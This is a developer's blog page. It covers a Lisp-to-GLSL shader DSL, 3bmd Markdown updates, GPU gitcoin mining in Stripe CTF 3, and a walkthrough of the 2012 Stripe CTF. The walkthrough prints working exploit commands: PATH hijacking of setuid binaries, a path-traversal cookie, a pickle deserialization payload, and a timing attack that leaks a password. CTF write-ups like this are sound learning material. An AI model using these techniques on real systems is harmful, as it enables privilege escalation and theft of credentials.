[insert blog here]
3bgl-shader alpha releaseSun, 21 Sep 2014 17:13:17 CDT

One of the things I have been working on off and on for the last few years is a DSL for translating something resembling Common Lisp to GLSL. Recently, I finally got around to combining the various pieces into something approximately usable, and the result is 3bgl-shader.

It is still a bit rough, in particular most of the error messages are pretty bad. The main features (type-inference, dependency tracking, and interactive usage) seem to be working reasonably well though.

The video also shows something else I've been working on recently, which is a hack to show an xterm within a 3d scene, using the X Composite extension. That part is even rougher, to the point it doesn't even start up reliably. When it does start, it works reasonably well, and I even managed to get a nested draw loop working on *debugger-hook* so it can be used to debug code running in an emacs displayed on the xterm from within the code being debugged.

Just a quick note so I can find it again:Sun, 21 Sep 2014 00:00:00 CDT

To get a full backtrace in sbcl debugger (including from slime sldb) with all of the internals involved in signalling the error:

(setf sb-debug:*stack-top-hint* 'sb-debug::invoke-interruption)

before triggering the error.

Useful when there is a problem with the internals, and the stack trace wouldn't otherwise show the interesting frames.

Blogging againSat, 28 Jun 2014 00:00:00 CDT

Trying to get started blogging again, so finally uploaded some old posts that had been waiting on me to tweak the colorization a bit, and some info about recent 3bmd changes.

3bmd updates

3bmd is a Markdown processor implemented in Common Lisp, with various extensions.

Thanks to Vsevolod Dyomkin, it now has an extension to support some of the PHP Markdown Extra table format, so

| Left  | Center Aligned  | Right |
| :------------ |:---------------:| -----:|
| *marked up*      | some wordy text | 123 |
| plain | **centered** | 4 |

renders as

Left Center Aligned Right
marked up some wordy text 123
plain centered 4

Unlike the original PHP Markdown Extra tables, the | are required on both sides of the table.

Thanks to Gábor Melis, 3bmd can also output markdown, for example after making modifications to the parsed document.

Unfortunately the internal parse tree is still pretty ugly and not an officially supported API yet, so expect it to change at some point.

Stripe CTF 3Thu, 20 Feb 2014 00:00:00 CST

Stripe had their third "Capture the Flag" at the end of January (more info here and here). Didn't do as well on this one as on the first one, but at least managed to get second on the 'gitcoin' level.

A combination of factors kept me from finishing:

  • Sleep deficit from the microcorruption.com CTF the week before.
  • Trying to use CL for all the problems and trying to use unfamiliar/unfinished libraries.
  • Not liking the format.
    While the problems were interesting, the presentation as "trying to build something useful/important" instead of "trying to find and exploit flaws" as in CTF1 or microcorruption made it feel sort of odd to be hacking together the ugliest thing that could possibly work, or to be focused exclusively on speed at the expense of generality or maintainability.
  • The biggest problem though, was just focusing too much on gitcoin mining :)
Level 0

Level 0 was effectively just a simple (buggy) spell checker. Read whitespace delimited character sequences, then downcase them and look them up in a dictionary. Finally, print the character sequence, surrounding it in <> if not found in the dictionary, and preserving the whitespace.

Just reading the dictionary into a hash table was good enough to pass and get to #201 on the leaderboard. Unfortunately someone mentioned the fast solution (Bloom filters) in IRC, and from what I understand the fastest solutions were limited mostly by the timing wrapper, so I wasn't as motivated to try any of the ideas I had for improving my solution (like memory mapping the dictionary file and doing a binary search directly in that, or indexing it in advance and only loading pieces).

Level 1

Level 1 is where I spent most of my time. The goal was to write a miner for a git-based cryptocoin called "gitcoin". To mine a gitcoin, you have to successfully push a commit with a hash less than a specified "difficulty" value. To pass the level, you have to get a commit before a set of bots push a commit, which happens every 90 seconds or so. After that, there is an option to play against other players.

The provided example is a shell script that just calls git commands to check hashes. Considering that at the initial difficulty the odds of getting a valid hash are about 50% after 11 million tries, starting a new process for every try is probably a bad idea.

The obvious first optimization is just to move the hashing loop into a single process. That takes a bit of work, since you need to replicate the way git hashes commits correctly, then make sure you can pass the data to git (or some git wrapper library) so it gets the same hash when it creates the actual commit.

Originally, I was calling git commit-tree and trying to get the GIT_AUTHOR_* and GIT_COMMITTER_* environment variables set properly so git would create the same commit I had hashed. That worked, but eventually switched to the easier method of just doing git hash-object -wt commit

I think with just doing hashes in CL (using ironclad for SHA1), I was at around 150k hash/sec, enough to beat the bots to finish the level, but not enough for the PvP bonus round.

After the basic hashing and git operations are working, the next step is to take advantage of the fact that SHA1 hashes in blocks and each commit starts with the same header. We can hash just the header, then save the state of the hash at that point and reuse it for each attempt, which speeds up the hashing by 3-4x. That and some other optimizations eventually got the pure-CL miner to about 650-700k hash/sec, at which point it was time to break out the OpenCL.

I had written part of a bitcoin miner as a test for my CL OpenCL library, so I could reuse some of that. I just needed to replace the double SHA256 kernel with a single round of SHA1, and connect it to git instead of a bitcoin client.

Due to lack of sleep and not remembering how the old code worked, that probably took longer than it should have. I made lots of simple mistakes like miscounting the number of characters to put in the commit message to get an even number of SHA1 blocks, or miscounting the number of bits in the message to put in the SHA1 header.

Once that worked though, it was hashing at 950MHash/sec on a GTX 780, quite a bit faster than the CPU miners (fast C miners were up to ~5-10MH/s per core, some running on a few machines). Eventually the other GPU miner woke up, and made it obvious that I needed to work on my git code, since I was losing despite having about 5x the hash rate.

I was originally running single threaded, so I would stop hashing while waiting for git operations to complete, which took from a second or 2 for a pull up to 5 or 6 seconds for a successful push. Switching to multiple threads allowed continuing to hash while checking for new commits on server, keeping effective hash rate closer to peak. It also allowed starting to work on the next coin while pushing, which is a pretty strong advantage when the difficulty is low enough (as it was at that point) to find multiple coins before a push finishes.

It took a few tries to get the threading working right though. I originally over-thought things and divided up the work poorly, leading to some races.

For a while I stopped mining and later was only mining for one 15-minute round per hour, due to not liking the way the scoring was working out with a wide range of hash rates. The scoring was a combination of some points per round for everyone that got at least 1 coin, and ELO ranking between the people that got coins. The problem with that is that people who manage to get 1 or 2 coins get penalized in the ELO part, possibly lowering their overall score, while people with lower hash rate that didn't get any coins stay at the same score.

The organizers increased the per-round bonus partway through to help avoid the problems with ELO only affecting people fast enough to get coins, which seems to have helped. Unfortunately I didn't think through the implications of the increased bonus, so left my miner running only 1 round in 4 overnight and missed out on a bunch of points.

Eventually a few other people finished GPU miners and some people with access to clusters (or EC2 instances) were running a few hundred MH/sec on CPUs, so I switched my miner to use binary nonces in the commit message rather than converting to ascii in the OpenCL kernel. That improved hash rate to over 1GH/sec, and I added in the AMD A8-5600K APU on a different machine for another 160MH/sec until it locked up the machine.

From there it was just a question of people looking for more GPUs or more machines, and waiting for the final score. I tried adding a HD 6870, but unfortunately the machine with a free PCI-E slot also had sata connectors in the way, so my final hash rate was only 1.2GH/s. One of the people with a cluster was around 1.1GH/s for a while, but ran into heat problems, and the final winner was running 4.2GH/s at the end.

Level 2

Level 2 is where I started running into problems with my choice of language and libraries. The task for the level was to write proxy for some web services to filter out a DDOS attack.

The first problem I ran into is that one of the libraries I wanted to use built a shared library, but the paths changed between the build and test environments, so it couldn't find the library. They fixed the paths quickly once I figured what the problem was, but it took a while to figure out what was happening.

After that, I ran into problems getting the various libraries I tried to use working together, and one of them wasn't as finished as I'd thought it was. In the end, I gave up and just modified the example node.js script.

Rejecting requests from IPs that had more than 4 requests in the last 200 ms or that had been rejected a few times already, unless the server was idle, was enough to pass but didn't score very well.

Level 3

The task for level 3 was a "code search" web service, which would index a set of files on demand, then respond to queries with a set of files containing the requested word.

Level 3 is where I gave up, after again running into problems with my code not running on the test server and not feeling like trying to debug it.

Stripe CTFMon, 12 Mar 2012 00:00:00 CDT

Stripe recently presented a set of challenges to "capture the flag" by finding and exploiting security vulnerabilities in a series of setuid binaries and web services. Now that the CTF is officially over, here is a summary of how I captured the flag:

Level 1

Level 1 is pretty easy, a setuid binary calls another program (date) without specifying a path, so we just need to create our own date program (or shell script), make it executable, then run the provided binary with our date first on the PATH.

$ echo /bin/cat /home/level02/.password > date
$ chmod +x date
$ PATH=. /levels/level01
Level 2

Level 2 gives us a PHP script that uses the contents of a cookie to construct a filename, then sends the contents of the file back to the user. We just need to send a relative path to the password file as the value of that cookie.

$ curl -u level02 --digest \
       --cookie user_details="../../home/level03/.password" \
Level 3

Level 3 gets a bit harder. It gives another SUID binary, with a disabled function to call an arbitrary program. Unfortunately it neglects to check for negative numbers when validating input, so we can fall off the front of its function pointer table instead of going past the end. With a bit of poking around in gdb and careful choice of index, we can hit the other argument passed to the program, and store a pointer to the run function there, at which point we are back to calling another program without specifying a path, as in level 01.

$ echo 00000000: 5b870408 | xxd -r > run
$ echo /bin/cat /home/level04/.password > `cat run`
$ chmod +x `cat run`
$ PATH=. /levels/level03 -28 `cat run`
Level 4

Level 4 is another setuid binary, this time with a pretty obvious buffer overflow.

char buf[1024];
strcpy(buf, str);

A quick web search turns up a nice review of why buffer overflows are bad, including a program to automate generating a string to pass to the program in order to exploit the overflow.

Unfortunately, the CTF binaries are 32bit, and the system doesn't seem to be set up to compile 32 bit binaries, so the exploit program can't guess the proper stack address... back to gdb to get an address and hard code it, at which point we run into another problem: "Address Space Layout Randomization."

Attempting to disable ASLR using setarch didn't seem to help, so back to the web to find a more recent example of why buffer overflows are bad, even with ASLR. The ret2eax strategy from that paper combined with the previous code lets us use the buffer overflow to run a shell as level05, at which point we can just read the password directly.

Level 5

Level 5 gives us a Python web service to exploit. Looking around in the source leads to a suspicious regex: '^type: (.*?); data: (.*?); job: (.*?)$'. A quick test with ; job: in the data passed to the service verifies it does in fact parse it incorrectly, so we can pass arbitrary data to the job field.

Tracing through the code more carefully, the job value is a class instance serialized/deserialized using pickle, which apparently should not be used with untrusted data. If we can make the deserialization code execute arbitrary commands, we just need to have it copy the password somewhere we can read it:

$ chmod o+w .
$ curl localhost:9020 -d "; job: cos
(S'cp /home/level06/.password `pwd`/ ; chmod 777 `pwd`/.password'
$ cat .password
Level 6

Level 6 goes back to another setuid binary, this time without any obvious way to inject our own code into it to take control. Luckily it makes the mistake of doing something as soon as it finds a mismatch between the guess and the real password, so if we can figure out a way to detect that, we can try 1 character at a time and see which one it doesn't complain about.

Since it also makes the mistake of printing something every time it checks a character, we can arrange to kill it after it makes a certain number of checks by sending the output to a pipe, then closing the other end of the pipe.

$ mkfifo foo
$ head -c 34 foo & sleep 0.1 ; /levels/level06 /home/the-flag/.password aa 2> foo

The above lets level06 print 34 characters ("Welcome to the password checker!", a newline, and one "."), then closes the reader on the pipe, killing level06 with SIGPIPE. If the first character was wrong, it prints the Ha ha, your password is incorrect! message before being killed on the . from the second character.

Adding in a quick loop lets us test a range of characters reasonably quickly:

$ for a in {0..9} {a..z} {A..Z} ; do
> echo $a
> head -c34 foo & sleep 0.1
> /levels/level06 /home/the-flag/.password "$a"a 2> foo
> sleep 0.1
> done

then just scroll up to see which didn't give an error ("t"), add that to the beginning of the guess, and repeat to find the next character

$ for a in {0..9} {a..z} {A..Z} ; do
> echo $a
> head -c35 foo & sleep 0.1
> /levels/level06 /home/the-flag/.password t"$a"a 2> foo
> sleep 0.1
> done

and so on until we get to 5 for character 24, and no match for character 25, at which point we have the whole password theflagl0eFTtT5oi0nOTxO5.